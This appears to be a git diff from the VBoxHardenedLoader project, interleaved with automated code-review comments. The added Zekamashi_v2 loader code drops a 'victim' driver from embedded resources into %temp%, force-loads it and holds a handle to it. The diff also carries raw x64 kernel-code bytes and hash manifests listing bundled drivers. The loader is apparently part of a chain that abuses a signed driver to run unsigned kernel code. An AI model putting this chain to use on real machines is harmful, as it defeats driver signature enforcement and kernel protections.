0x72, 0xB4, 0x48, 0x8B, 0x44, 0x24, 0x60, 0x48, 0x8B, 0x5C, 0x24, 0x68, 0x48, 0x8B, 0x6C, + 0x24, 0x70, 0xF0, 0xFF, 0x48, 0x04, 0x48, 0x83, 0xC4, 0x40, 0x41, 0x5E, 0x5F, 0x5E, 0xC3 +}; \ No newline at end of file diff --git a/Source/Zekamashi_v2/loader/victim.c b/Source/Zekamashi_v2/loader/victim.c new file mode 100644 index 0000000..977f87a --- /dev/null +++ b/Source/Zekamashi_v2/loader/victim.c 
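Review bot: `BYTE x64kernelcode[1055] = {` defines an array with external linkage in a header; `#pragma once` only prevents re-inclusion within one translation unit, so a second .c file that includes tsmisc.h would produce a duplicate-symbol link error. Either make it `static BYTE x64kernelcode[1055] = {` here, or declare it `extern` in the header and move the definition into a single .c file. Whether it can also be `const` depends on whether the loader writes into the buffer before copying it, which is not visible in this diff. A one-line comment above the definition recording where the bytes come from and that the `1055` literal must be regenerated together with the initializer (presumably from the Tsugumi_shell project listed in this commit) would help reviewers of future updates.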
@@ -0,0 +1,204 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2018 - 2020
+*
+* TITLE: VICTIM.C
+*
+* VERSION: 1.00
+*
+* DATE: 24 Jan 2020
+*
+* Victim support routines.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+#include "global.h"
+
+/*
+* VictimLoadUnload
+*
+* Purpose:
+*
+* Load/Unload driver using Native API.
+* This routine will try to force unload driver on loading if Force parameter set to TRUE.
+*
+*/
+BOOL VictimLoadUnload(
+ _In_ LPWSTR Name,
+ _In_ LPWSTR ImagePath,
+ _In_ BOOLEAN Force,
+ _In_ BOOLEAN Unload,
+ _Out_opt_ NTSTATUS* ErrorStatus)
+{
+ NTSTATUS ntStatus;
+
+ if (Unload) {
+ ntStatus = supUnloadDriver(Name, TRUE);
+ }
+ else {
+ ntStatus = supLoadDriver(Name, ImagePath, Force);
+ }
+
+ if (ErrorStatus)
+ *ErrorStatus = ntStatus;
+
+ return (NT_SUCCESS(ntStatus));
+}
+
+/*
+* VictimBuildName
+*
+* Purpose:
+*
+* Create filepath to %temp% with given victim name.
+*
+*/
+LPWSTR VictimBuildName(
+ _In_ LPWSTR VictimName
+)
+{
+ LPWSTR FileName;
+ SIZE_T Length = (1024 + _strlen(VictimName)) * sizeof(WCHAR);
+
+ FileName = (LPWSTR)supHeapAlloc(Length);
+ if (FileName == NULL) {
+ SetLastError(ERROR_NOT_ENOUGH_MEMORY);
+ }
+ else {
+
+ DWORD cch = supExpandEnvironmentStrings(L"%temp%\\", FileName, MAX_PATH);
+ if (cch == 0 || cch > MAX_PATH) {
+ SetLastError(ERROR_NOT_ENOUGH_MEMORY);
+ supHeapFree(FileName);
+ FileName = NULL;
+ }
+ else {
+ _strcat(FileName, VictimName);
+ _strcat(FileName, L".sys");
+ }
+ }
+
+ return FileName;
+}
+
+/*
+* VictimCreate
+*
+* Purpose:
+*
+* Drop, load and reference victim driver.
+*
+*/
+BOOL VictimCreate(
+ _In_ HINSTANCE ModuleBase,
+ _In_ LPWSTR Name, //same as device name
+ _In_ ULONG ResourceId,
+ _Out_opt_ PHANDLE VictimHandle)
+{
+ PBYTE drvBuffer = NULL;
+ ULONG resourceSize = 0;
+ LPWSTR driverFileName = NULL;
+ HANDLE deviceHandle = NULL;
+
+ if (VictimHandle)
+ *VictimHandle = NULL;
+
+ driverFileName = VictimBuildName(Name);
+ if (driverFileName) {
+
+ do {
+
+ if (supIsObjectExists((LPWSTR)L"\\Device", Name)) {
+ printf_s("LDR: Victim driver already loaded, force reload\r\n");
+
+ printf_s("LDR: Attempt to unload %ws\r\n", Name);
+
+ NTSTATUS ntStatus;
+ if (!VictimLoadUnload(Name, driverFileName, FALSE, TRUE, &ntStatus)) {
+ printf_s("[!] Could not force unload victim, NTSTATUS(0x%lX) abort\r\n", ntStatus);
+ break;
+ }
+ else {
+ printf_s(T_PRNTDEFAULT, "LDR: Previous instance of victim driver unloaded");
+ }
+ }
+
+ drvBuffer = supQueryResourceData(ResourceId, ModuleBase, &resourceSize);
+ if (drvBuffer == NULL) {
+ SetLastError(ERROR_FILE_NOT_FOUND);
+ break;
+ }
+
+ NTSTATUS ntStatus;
+
+ printf_s("LDR: Extracting victim driver \"%ws\" as \"%ws\"\r\n", Name, driverFileName);
+
+ if (resourceSize != (ULONG)supWriteBufferToFile(driverFileName,
+ drvBuffer,
+ resourceSize,
+ TRUE,
+ FALSE,
+ &ntStatus))
+ {
+ printf_s("[!] Could not extract victim driver, NTSTATUS(0x%lX) abort\r\n", ntStatus);
+ SetLastError(RtlNtStatusToDosError(ntStatus));
+ break;
+ }
+
+ ntStatus = STATUS_UNSUCCESSFUL;
+ if (VictimLoadUnload(Name, driverFileName, TRUE, FALSE, &ntStatus)) {
+
+ SetLastError(RtlNtStatusToDosError(ntStatus));
+
+ if (VictimHandle) {
+
+ ntStatus = supOpenDriver(Name, &deviceHandle);
+ if (NT_SUCCESS(ntStatus)) {
+ *VictimHandle = deviceHandle;
+ }
+ else {
+ SetLastError(RtlNtStatusToDosError(ntStatus));
+ }
+ }
+
+ }
+ else {
+ SetLastError(RtlNtStatusToDosError(ntStatus));
+ }
+
+ } while (FALSE);
+
+ supHeapFree(driverFileName);
+ }
+
+ return (deviceHandle != NULL);
+}
+
+/*
+* VictimRelease
+*
+* Purpose:
+*
+* Unload victim driver.
+*
+*/
+BOOL VictimRelease(
+ _In_ LPWSTR Name
+)
+{
+ BOOL bResult = FALSE;
+
+ LPWSTR driverFileName = VictimBuildName(Name);
+ if (driverFileName) {
+ bResult = VictimLoadUnload(Name, driverFileName, FALSE, TRUE, NULL);
+ DeleteFile(driverFileName);
+ supHeapFree(driverFileName);
+ }
+
+ return bResult;
+}
diff --git a/Source/Zekamashi_v2/loader/victim.h b/Source/Zekamashi_v2/loader/victim.h
new file mode 100644
index 0000000..fb6af50
--- /dev/null
+++ b/Source/Zekamashi_v2/loader/victim.h
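Review bot: `VictimCreate` reports success as `return (deviceHandle != NULL);`, but `deviceHandle` is only opened inside `if (VictimHandle)`, so a caller that passes NULL for the `_Out_opt_` `VictimHandle` gets FALSE even when the driver was extracted and loaded successfully, and the driver stays loaded. Track the load result separately: add `BOOL bLoaded = FALSE;` to the declarations, set `bLoaded = TRUE;` directly after `if (VictimLoadUnload(Name, driverFileName, TRUE, FALSE, &ntStatus)) {`, and finish with `return VictimHandle ? (deviceHandle != NULL) : bLoaded;`. The do-block also declares `NTSTATUS ntStatus;` twice (once inside the force-unload branch, once after the resource lookup); a single declaration at the top of the function would be clearer. In `VictimRelease` the result of `DeleteFile(driverFileName)` is ignored, so a failed deletion (for instance when the unload failed and the image is still in use) silently leaves the extracted `.sys` in %temp%; it deserves at least the same logging the failures in `VictimCreate` get.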
@@ -0,0 +1,29 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2018 - 2020
+*
+* TITLE: VICTIM.H
+*
+* VERSION: 1.00
+*
+* DATE: 07 Jan 2020
+*
+* Victim support prototypes and definitions.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+#pragma once
+
+BOOL VictimCreate(
+ _In_ HINSTANCE ModuleBase,
+ _In_ LPWSTR Name, //same as device name
+ _In_ ULONG ResourceId,
+ _Out_opt_ PHANDLE VictimHandle);
+
+BOOL VictimRelease(
+ _In_ LPWSTR Name);
diff --git a/VBoxHardenedLoader.sha256 b/VBoxHardenedLoader.sha256
new file mode 100644
index 0000000..b8a6781
--- /dev/null
+++ b/VBoxHardenedLoader.sha256
@@ -0,0 +1,77 @@ +d9fc9680e59ecf891c6472db3c4fe7e8fea5ccc6861e00d71150e7bd87aae720 *Binary\howto.md +f722b23ba22e1eb66cfd441c1f2bab8245cc623d6e8881da87ca3bffe0aaedbd *Binary\linux.md +f0a867a9f238f0ecef1cc81f5e1fa4daa333b4a8a26ca490798e8e269bb24cbe *Binary\loader.exe +07c63ac8ab15ee31fda7239ad4677e1df6e96b7a7691bfb4c540f51653fc9aa4 *Binary\support.txt +8b0abfc673b112d9f03f72fd290e458fc1287a9951fca1ec4ee7073c510b0dd2 *Binary\data\ACPI-DSDT.bin +cb0f64b49b41ae8f9d88b9704372c55e2c900296bee166a4bd460c7c7b0e1b9b *Binary\data\ACPI-SSDT.bin +ebbcf51c60a02b8dc798d791f95a884b42feeeef6a9f51a1c8c3bed16f579271 *Binary\data\efi_amd64_fixed_6.1.2.fd +d031f2dd0043f10b76801c77d68ca0895ec737f3279f42c9fd71b1b9cdc590eb *Binary\data\hidevm_ahci.cmd +2612137360243c45fd38e7bfc522184b45045365bd5826a5a14850d8e5de886f *Binary\data\hidevm_efiahci.cmd +6b7ea23a762ae3aa7c095f6f4016038d0382eb35c57a73a87494b17ab0978792 *Binary\data\hidevm_efiide.cmd +6ca1ddae38e050fae56d541b92e8f0b733351ee26a85f233a1815d15ff1bcf4a *Binary\data\hidevm_ide.cmd +df58faf9bb13d4871e7c21cd2d8c8efed0d65553159f921c486bb2487b687715 *Binary\data\pcbios386.bin +96db5da69d9d7dc09dc82fb50c10f6101e632fb99c06ee4e18a8c6ad2100eb6c *Binary\data\splash.bmp +f6173b695338900a97bb335ae4496505b0e6ed5b917ce9e97b0ff3b6e58352f3 *Binary\data\vgabios386.bin +43614aaf5eb4f9b548dc67e68c99564c0b838f2a1a4317d17c8d924370f5ab80 *Binary\data\linux\hidevm_bios.sh +3591c6110bbba064f317c84c737d006aa077afa183f7a8d5feb274375c6f892e *Binary\data\linux\hidevm_efi.sh +018266ab511243b3ac2e1ff71befef091909dc59cbbfa656725ba97eb8c32b81 *Binary\data\linux\readme.txt +7de042d3c3194acb5081f0f65b208f739ae9eb2fe38028c75daaf7e16bd1c9ff *Binary\help\10_script.png +6eaba9d2cb90c26d95bdb72e2079b6a3e237ce1cd117fe9799fe376067b9fede *Binary\help\11_loader_before.png +1e358f116d7fe3dd1100333b1c6ab1af077fa5d7a818f7ea396fcd9966a5885b *Binary\help\12_loader_after.png +07cb1d1d1d3155913f2ef0bdfb25a479f1e1e4fd87b65f92e3e4e0ac829577de *Binary\help\1_install.png 
+30f65c67d518442eec8de3ddf51d266c7255898514e42f4bf0d13d854fdfff26 *Binary\help\2_createvm.png +19abe5eb41802336f3f707c1ca9fdb95610e193dcc4e1226f886b5dfd61de719 *Binary\help\3_createhdd.png +0ab3d9e0e2424c7376ffb1452bf0271627e7194b5559dd93ab87d573e72a1c2b *Binary\help\4_settings_mb.png +958f31557370f70d8866134f181b91e987b2f30269eb9974ef0abed08d8bc632 *Binary\help\5_settings_cpu.png +1e92efb7a77aca80ce45b836941edaf51e9d0859cbcc2a0a233a0631cf0fdef8 *Binary\help\6_settings_accel.png +187377109de3ce610d7c85febb550194260522a7c7ee5553f6dea7c23f64f8ae *Binary\help\7_display.png +bba17669445671d1615e974328fd5a7df35f4572b26bfc5656b5aaad4b92517a *Binary\help\7_display2.png +da60acc37c2fd78676d3ff18a199d740b73a80368912d0ebb0e7250de88d6e7d *Binary\help\8_storage.png +c67f7a54392551f91d836bd52fa41310657d343cdcc2c7342983aa5e94b2d0d0 *Binary\help\9_network.png +4bf5ef7b3cd7525b163b1ceefab29d95995b19ccb9691573b0359171f15cbd76 *Source\Tsugumi_shell\Tsugumi_shell.sln +661ab1e6d69a0ab1c52e430bc67e85c34fbef383503d73dbe6a7bbdadf5d5e47 *Source\Tsugumi_shell\Tsugumi_shell\fnorder.txt +ee8b31d381e41237daf258628f3a0b7306871da87448938bfb2d6a03a0bdc25f *Source\Tsugumi_shell\Tsugumi_shell\main.c +d7f491066ab282b0f65bb71107e9abbe5a4b6f7b7fbe0c10a1901766ebf101ee *Source\Tsugumi_shell\Tsugumi_shell\Tsugumi.h +547f41bf274e29ad195629f24dae562f5fe26a1101bf002eee9598ba5083111a *Source\Tsugumi_shell\Tsugumi_shell\Tsugumi_shell.vcxproj +f35b27d946aa1303272413b0793e02af0d8d4f2b620c7b1c9289ad2a85a2774e *Source\Tsugumi_shell\Tsugumi_shell\Tsugumi_shell.vcxproj.filters +07266f4866de425d0c27fd0d1ddc79c5b7e8ae641851702f7ec3e0ca0e54882b *Source\Tsugumi_shell\Tsugumi_shell\Tsugumi_shell.vcxproj.user +2432e3e07fc6e9f9059ddede5c9a030d08ba832908189c8b5a77bad1f92d7ac4 *Source\Zekamashi_v2\Zekamashi.sln +1c1e8000d3ce2fc37dd29079de0ff40cfbcbe6ca6bd5968557efcf882ae243c4 *Source\Zekamashi_v2\loader\consts.h +5dc1ad50b24831d86f42130c8948005c7c2789841d91a4071e8a13590bc52a9d *Source\Zekamashi_v2\loader\drvmap.c 
+9e50bcf51c31a9ad303ba994591e0ffdccfa9c0e652c3ec434bd66224a5598c0 *Source\Zekamashi_v2\loader\drvmap.h +0375979f5c0d5a9f03b73c613650e58dd6d876dd331dabf1bb6a219a4666ea73 *Source\Zekamashi_v2\loader\global.h +1209f62c2a36eda03bfb4b57766797b1dbb39d5062eed8f228ab4a525b1f3806 *Source\Zekamashi_v2\loader\loader.vcxproj +0c626683d96f53a91c96349c4b5f11986cefd56f242c2b85c1e2b6c77f8624d5 *Source\Zekamashi_v2\loader\loader.vcxproj.filters +e370cf3ee7cfdb30f92017530c597e1a71db422a362ae646abd7e00dfca7ccbe *Source\Zekamashi_v2\loader\loader.vcxproj.user +cc058ba07850a583c68f8f280e62ae47f09950ac89bae5adb5d24c31258ca2f8 *Source\Zekamashi_v2\loader\main.c +df328b27c089423e589264fe5ed1c48c4de258facda4124ba4bc18378bfa04e1 *Source\Zekamashi_v2\loader\oscompat.manifest +39014dc5597d9bbae619b663fe7feb339211fe99f2e8397bca187bab55ee98ca *Source\Zekamashi_v2\loader\patterns.c +8117b440f7945c6ec9036d38ce590d6384e8bdd748a76eaac04545a9be1b238b *Source\Zekamashi_v2\loader\patterns.h +54cf61f71c7fff27bd4c771885f88dae20a0f26cd24b880f427410232fe6b17f *Source\Zekamashi_v2\loader\resource.h +f84a9a6a850a36fcae58cbabccb9e54d51e6c91c7065682fe553e06d9586ae08 *Source\Zekamashi_v2\loader\Resource.rc +74a159814e524e6c83e9c456713185049b547da62edc87a6c6653d33166c99e4 *Source\Zekamashi_v2\loader\sup.c +819a1a9b26f3c4f8f9e0ef1a711495d0934c3691836a3a032aaf786657954d95 *Source\Zekamashi_v2\loader\sup.h +26fc44939eac3a5b0a799f8b8be8e54cb0009c39dd8929b5a3f8b0bc9d8f5646 *Source\Zekamashi_v2\loader\tsmisc.h +9b015373fe2823dd05fdda2dc0fe943c2b587bbb35c608f90506c620fe4d6a4a *Source\Zekamashi_v2\loader\victim.c +f26fc0e6c1267c30701d8d2cf137bd7a191ddbbd4bcff691cef98fd060cbebcb *Source\Zekamashi_v2\loader\victim.h +4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b *Source\Zekamashi_v2\loader\drv\iQVM64.sys +9b6a84f7c40ea51c38cc4d2e93efb3375e9d98d4894a85941190d94fbe73a4e4 *Source\Zekamashi_v2\loader\drv\procexp.sys +53a7ce27591e040b63880a3dd326b8ba8c97a0fa34d5e2d32aba89a0147434f6 
*Source\Zekamashi_v2\loader\hde\hde64.c
+e99aa4997bda14b534c614c3d8cb78a72c4aca91a1212c8b03ec605d1d75e36e *Source\Zekamashi_v2\loader\hde\hde64.h
+f8e6a0be357726bee35c7247b57408b54bb38d94e8324a6bb84b91c462b2be30 *Source\Zekamashi_v2\loader\hde\pstdint.h
+b774446d2f110ce954fb0a710f4693c5562ddbd8d56fe84106f2ee80db8b50a2 *Source\Zekamashi_v2\loader\hde\table64.h
+d06b7f3a6daf9487f544bb98a32695258d6cb5a1579d745d65e6e37d263e804f *Source\Zekamashi_v2\loader\idrv\nal.c
+1214eec7d324c0b305782b151f3c4064c568c7ad26487df70cf4455640760ef4 *Source\Zekamashi_v2\loader\idrv\nal.h
+28eae019e74dfd55cb5a86e3fa6cb87779ea70bfa281f6593a809b63858019eb *Source\Zekamashi_v2\loader\minirtl\cmdline.c
+a108a76d0b5113772c20f7329eaeac490dab2f9ce0b7beaeea5fe80bbdb041cf *Source\Zekamashi_v2\loader\minirtl\cmdline.h
+757523eaa1838f873e41bdeea69c839d21aa8a8e0c96c1918121ea86a222267f *Source\Zekamashi_v2\loader\minirtl\minirtl.h
+82bdda67972f1b07b8c486208cf782f2a75e8efab0eb66c089e64f03b35aeb77 *Source\Zekamashi_v2\loader\minirtl\rtltypes.h
+d0c65008262381fd065ba8c364cfa5cf8b471c363bf385e3a468fa53945af918 *Source\Zekamashi_v2\loader\minirtl\ultohex.c
+c902616e5949b38a2700741c775417f9a52270a469864d9ef033664682bdc458 *Source\Zekamashi_v2\loader\minirtl\_strcat.c
+2a67c7690ec6df8e233207116b0e4fe76c02ae43595d9e606e123572b6ac88a1 *Source\Zekamashi_v2\loader\minirtl\_strcmp.c
+1e903e3ac78a19475b485f6408d455f6258ee8f1f3a5d3b2e8b4c972bd32bc00 *Source\Zekamashi_v2\loader\minirtl\_strcmpi.c
+43c13acfea0213bc1651f11f42d55f2830447e149ad6176326ba8226e4c9d3e6 *Source\Zekamashi_v2\loader\minirtl\_strcpy.c
+9fa6411f94c8a3866b887823569337bdb29796056f8cadb89791d84933d6861c *Source\Zekamashi_v2\loader\minirtl\_strend.c
+213f8bc30a76ead3c8a60b61cc46c76a873f06f7c0bb473effeb584a6588a308 *Source\Zekamashi_v2\loader\minirtl\_strlen.c
+0434d69daa20fbf87d829ffc17e43dcc2db3386aff434af888011fdec2f645a4 *Source\Zekamashi_v2\loader\minirtl\_strncpy.c
+0e1535a719ececda767b7e0e049170a4eb375329a730973f87a681dc8bd9392a *Source\Zekamashi_v2\loader\ntdll\ntos.h
diff --git a/VBoxLdr.sha256 b/VBoxLdr.sha256
deleted file mode 100644
index bf63f89..0000000
--- a/VBoxLdr.sha256
+++ /dev/null
@@ -1,121 +0,0 @@
-3bcf99c27fb6a3e0d8d7153585185efe796352e6c5d36ceeee8c8fa2ac45d057 *Binary\install.cmd
-7bb4486a4fbb951470787e9a2c1fa6b02923a2b1a99025b67dda432b49685041 *Binary\install.md
-aa27115b07b9dd97211ad5485080758c378b09882fd829d423e75f0ce91d096c *Binary\install_signed.md
-e5c6f865530446cd7d921f3af89bd42949a88c90e54f199f5ccb625e2e27fb05 *Binary\linux.md
-25bf609cb5017a007a6c60c0d3f2ee4cf494cac6652f94acf743de2a052e6570 *Binary\loader.cmd
-e98af50c4e897bd1e6bdd58377481a19f976b1d7b7889aabace562ebce7ddae5 *Binary\loader.exe
-0d1e0c1e14b614ed3b156d0f43ed7cdb872cb5b967ed70c0ba501e3cbc2daca2 *Binary\tdl.exe
-8d0bfe64cfde7a5c34f002c7f101a81df562c6f2217fea9ca4ce89980356434e *Binary\Tsugumi.sys
-ac8bd71b0bbbf083b83d104b710f09da857fc310a8c23f99a5fa910160a3c4b6 *Binary\data\ACPI-DSDT.bin
-e22b989cc06c01d30bda80267cecf99ba5def9cc106a920ee2b37a6d01a2d83e *Binary\data\ACPI-SSDT1.bin
-3e762c298adae7a45bf7e708fe95041d74f917fac80bff8cb6242d25561657aa *Binary\data\hidevm_ahci.cmd
-79ab4b06911110af010b5dff3fd35143de6215e21b3e1e7d265ee5eec9e1d64f *Binary\data\hidevm_efiahci.cmd
-fb13c37b08df4a80c8c0c6e31b7b6a7e08806b09ceb9e867ea74e583ceb79424 *Binary\data\hidevm_efiide.cmd
-65a2dc1ea8c40d604a78525a3563593b9b11ea2d2e70c387b52980b18248666b *Binary\data\hidevm_ide.cmd
-a9e207b4d52b9f70237aadd658bd24bebfb7e3c669895034e3d0a7b70c76d3d6 *Binary\data\pcbios.bin
-4e01f7906ad056ee591920d086102e3e2e928f1168a2b15a56538925cdd370b3 *Binary\data\pxerom.bin
-96db5da69d9d7dc09dc82fb50c10f6101e632fb99c06ee4e18a8c6ad2100eb6c *Binary\data\splash.bmp
-19f0ae97ab97df2296e2245da5858afb94080df6e38104db11104a37ae6cf3aa *Binary\data\VBoxEFI64-6.0.0.fd
-c0fd6fc2f6c559e31155e9316f5e292fd1573c7068c80426964e388254f0fc20 *Binary\data\VBoxEFI64-6.0.10.fd
-a45af7372ceab4c59ae66a7c2213f1da42ab369001234606aaac8b998fe57d71 *Binary\data\VBoxEFI64-6.0.2.fd
-e593b91fef4125d9e2b9087f095b77fbaad672233feca4ec743d28c0c368ce21 *Binary\data\VBoxEFI64-6.0.4.fd
-44b3658586c406522b3f13d2ed8a44b3165d9b4a99d8620226bc66613515d8b4 *Binary\data\videorom.bin
-b5bdf1f98dce80572af00488fe828bd5c614d1b00b1f2c701a9f626366ea5b69 *Binary\data\5.2.x\ACPI-DSDT.bin
-48dcfde10d68d8cd84eaad6769e487e98e4c31c29aa78ba2dd1a9ab0bc93fbef *Binary\data\5.2.x\ACPI-SSDT1.bin
-3e762c298adae7a45bf7e708fe95041d74f917fac80bff8cb6242d25561657aa *Binary\data\5.2.x\hidevm_ahci.cmd
-79ab4b06911110af010b5dff3fd35143de6215e21b3e1e7d265ee5eec9e1d64f *Binary\data\5.2.x\hidevm_efiahci.cmd
-fb13c37b08df4a80c8c0c6e31b7b6a7e08806b09ceb9e867ea74e583ceb79424 *Binary\data\5.2.x\hidevm_efiide.cmd
-65a2dc1ea8c40d604a78525a3563593b9b11ea2d2e70c387b52980b18248666b *Binary\data\5.2.x\hidevm_ide.cmd
-3100322530613c2549a8cf656b2da7da1f7682f952bf69fdf5b77891de467306 *Binary\data\5.2.x\pcbios.bin
-4e01f7906ad056ee591920d086102e3e2e928f1168a2b15a56538925cdd370b3 *Binary\data\5.2.x\pxerom.bin
-96db5da69d9d7dc09dc82fb50c10f6101e632fb99c06ee4e18a8c6ad2100eb6c *Binary\data\5.2.x\splash.bmp
-4a58991d13f292ae75a5d1954b857263bfa4aba264a2553bb741cd8d737fdd00 *Binary\data\5.2.x\VBoxEFI64_5.2.12.fd
-204c44f88294bad3dd092b45806d89177af8dfcb61cc4526bf0a0c3ad95a3cf4 *Binary\data\5.2.x\VBoxEFI64_5.2.18.fd
-64f6a4a76c4ea5eb0289106e9609878d31d388d39b918cb633ba995f34a97ce4 *Binary\data\5.2.x\VBoxEFI64_5.2.4.fd
-58f48c8bfd34788683244a001de8a5ad90d15da049f721bfbf3ed320bbab92de *Binary\data\5.2.x\videorom.bin
-0b0c6f39c54b2cb7cab707affa99d18b7fa915b05f10b29f5f3053293b6f251d *Binary\help\10_script.png
-3f8cbd6c040c752602d3a42ebcc3e00cf081fe62af17aa2716cb3f37f52c0e36 *Binary\help\11_tdl_tsugumi_before.png
-7b72781a32fd79c7ee7288458f39e3794f63203145bf6f97cc6072be6528ecaf *Binary\help\12_tdl_tsugumi_after.png
-76a65aba0837bb1037c2eab6f168898fdcd83a748102dc62f4a5eb07240615cf *Binary\help\13_loader_help.png
-3bd0b5d973956242f2ef64d6224e5fce38f20f8f781d5291021ccccecd047e56 *Binary\help\14_loader_start.png
-1ecb44d1ca5d42df636ceeb3068b66eb55c462fb82fddeb452c453124003c91f *Binary\help\15_loader_signed.png
-f4d27552ca678b863fe3de39910342c469c379e50018247fbb60900f1532601b *Binary\help\1_install.png
-82cdc3d970dd5854e1373cf0f12d5cae8d09f6dd18e2ab4ad0ed84f13c09900d *Binary\help\2_createvm.png
-585f1ed4eee7c38157c18c9bcad0addd13501a76ae4c22c830c27d819e39d60c *Binary\help\3_createhdd.png
-9abb548fef23b65e3fcd94f4018b3f1f82ecbf0eeaeef2f27216891ef6b6c5ec *Binary\help\4_settings_mb.png
-a3b04f2bde25f22b0dc9ccd4d55455bf7e1a1ba05f9da3e6ac038db5ea1a6d90 *Binary\help\5_settings_cpu.png
-19effb249bc34e8b764a4186ca2e406ed9056ed43796941926db812afb0512f6 *Binary\help\6_settings_accel.png
-59396c00655ca710d90ac0b5517e1e0052cc856bc0c3fdaf7daad546bb463004 *Binary\help\7_display.png
-5d075e5eee28ada7c4b0fde691d688a3fed4ce45806b76052c40a2b4085b6237 *Binary\help\8_storage.png
-43b1df292952f586a4d7f602d294e1face5b160ebd7bf20a556ddc9034ad8c8b *Binary\help\9_network.png
-70c5bbb899599d4cce2cc6d64c79f4b8cc999de9fee3c5f56eba2bdccc55f78f *Binary\help\vbox6_efibug_workaround.png
-b5bdf1f98dce80572af00488fe828bd5c614d1b00b1f2c701a9f626366ea5b69 *Binary\linux\ACPI-DSDT.bin
-48dcfde10d68d8cd84eaad6769e487e98e4c31c29aa78ba2dd1a9ab0bc93fbef *Binary\linux\ACPI-SSDT1.bin
-5fa817a7cddff46b6b4ed0d9a5f91d13852a9301638ee358f78b916666b9ae79 *Binary\linux\modifyvm-BIOS
-99e0b783c376bf480cb9afb3002740b78578622faa214a2b4b329dfc61d89282 *Binary\linux\modifyvm-EFI
-7bfa8b960a942d2f5e3c53467cef4a749801d97eb5fc5aa2970c5a7dd8d2b0ec *Binary\linux\pcbios.bin
-4e01f7906ad056ee591920d086102e3e2e928f1168a2b15a56538925cdd370b3 *Binary\linux\pxerom.bin
-8b492986d7cbb8602eb148514c9b3abd632e6b520104de8deed38fc839fedd0f *Binary\linux\readme.txt
-96db5da69d9d7dc09dc82fb50c10f6101e632fb99c06ee4e18a8c6ad2100eb6c *Binary\linux\splash.bmp
-251022747726ca0c1cbbb1eb65bc874e6a470ca270f5e8b494533f7d1bffd13a *Binary\linux\videorom.bin
-0eabd6f275e158b6bfa1019848e8ad0edfc03f82001599914a158675fe0e86cd *Binary\patchgen\Kasumi.exe
-1cf445df8841e6bb9e0696f860f120ac08b30b022a849483c2692b5fd9301f08 *Source\CodeSigning.txt
-4cb099039e05156dd8e1266dfa491d9fdd472cc28382a4197db2c04d1e11dc4e *Source\Kasumi\VBoxPatchGen.sln
-27b89ba25c1620f7f46af4a239d6a18b71b9b689ea33eb7ab099e0b039cdf21f *Source\Kasumi\VBoxPatchGen\cui.c
-3058dea6894b1ca7bcff8896b35080c0ddfa1c541e7e505792cbac65dea9d0d9 *Source\Kasumi\VBoxPatchGen\cui.h
-61983dec1f453a78ece9eee71ff08194160cb150e64eab9984c7fff9126cee3a *Source\Kasumi\VBoxPatchGen\global.h
-109a7da0ce8f3c2f85b5b871af55193a4481b880a7cf20f85832db919629900a *Source\Kasumi\VBoxPatchGen\main.c
-d0debd4f7db2ef941f0b02e9d7d1b85d873f0a01dcb4537b5e112c68443aaaa6 *Source\Kasumi\VBoxPatchGen\ntos.h
-4785710be128dfd3f4e386f584ddada562fafa1903491c4d53c8a5f12b681701 *Source\Kasumi\VBoxPatchGen\patterns.h
-73adf98a7a275942811192166eca735dd785771cc29b29869f8a3e57b2f61f88 *Source\Kasumi\VBoxPatchGen\resource.h
-fe101af97c2004eacf5fd8e84e8de0d1e283cbb225dd5da8b7260beb3a6be75e *Source\Kasumi\VBoxPatchGen\Resource.rc
-5c2737bdb6e170fe2b77a7422553a9b2f30bb940f69535c73bec64d1f482102d *Source\Kasumi\VBoxPatchGen\VBoxPatchGen.vcxproj
-cd610e84416b63f7414e177e6b8398dd3e5e8787b344616ed53c26c5eb5c8fff *Source\Kasumi\VBoxPatchGen\VBoxPatchGen.vcxproj.filters
-87592b66543f1a83f263441e595e2a6a2dcab193581a5f511ab875d6914bce34 *Source\Kasumi\VBoxPatchGen\VBoxPatchGen.vcxproj.user
-28eae019e74dfd55cb5a86e3fa6cb87779ea70bfa281f6593a809b63858019eb *Source\Kasumi\VBoxPatchGen\minirtl\cmdline.c
-a108a76d0b5113772c20f7329eaeac490dab2f9ce0b7beaeea5fe80bbdb041cf *Source\Kasumi\VBoxPatchGen\minirtl\cmdline.h
-757523eaa1838f873e41bdeea69c839d21aa8a8e0c96c1918121ea86a222267f *Source\Kasumi\VBoxPatchGen\minirtl\minirtl.h
-82bdda67972f1b07b8c486208cf782f2a75e8efab0eb66c089e64f03b35aeb77 *Source\Kasumi\VBoxPatchGen\minirtl\rtltypes.h
-d0c65008262381fd065ba8c364cfa5cf8b471c363bf385e3a468fa53945af918 *Source\Kasumi\VBoxPatchGen\minirtl\ultohex.c
-c902616e5949b38a2700741c775417f9a52270a469864d9ef033664682bdc458 *Source\Kasumi\VBoxPatchGen\minirtl\_strcat.c
-43c13acfea0213bc1651f11f42d55f2830447e149ad6176326ba8226e4c9d3e6 *Source\Kasumi\VBoxPatchGen\minirtl\_strcpy.c
-9fa6411f94c8a3866b887823569337bdb29796056f8cadb89791d84933d6861c *Source\Kasumi\VBoxPatchGen\minirtl\_strend.c
-213f8bc30a76ead3c8a60b61cc46c76a873f06f7c0bb473effeb584a6588a308 *Source\Kasumi\VBoxPatchGen\minirtl\_strlen.c
-45311e7dc901baf0d3e3ef2ddd76863b84eaea45800cbea5672b87f286b57169 *Source\Tsugumi\main.c
-8d6786d0e26b06c9cb1d23e460b173a632fbcc82dc5109f3f1207e9aa888d222 *Source\Tsugumi\main.h
-6b95cd81ca4f309ac9f243ae73d2e8099634aaffead5b7b214bfcd14b6d604f6 *Source\Tsugumi\resource.h
-ceadc27f0df3d8e6282929fd40227713f531a5ddf4f6a171397ab10558cce0fc *Source\Tsugumi\Resource.rc
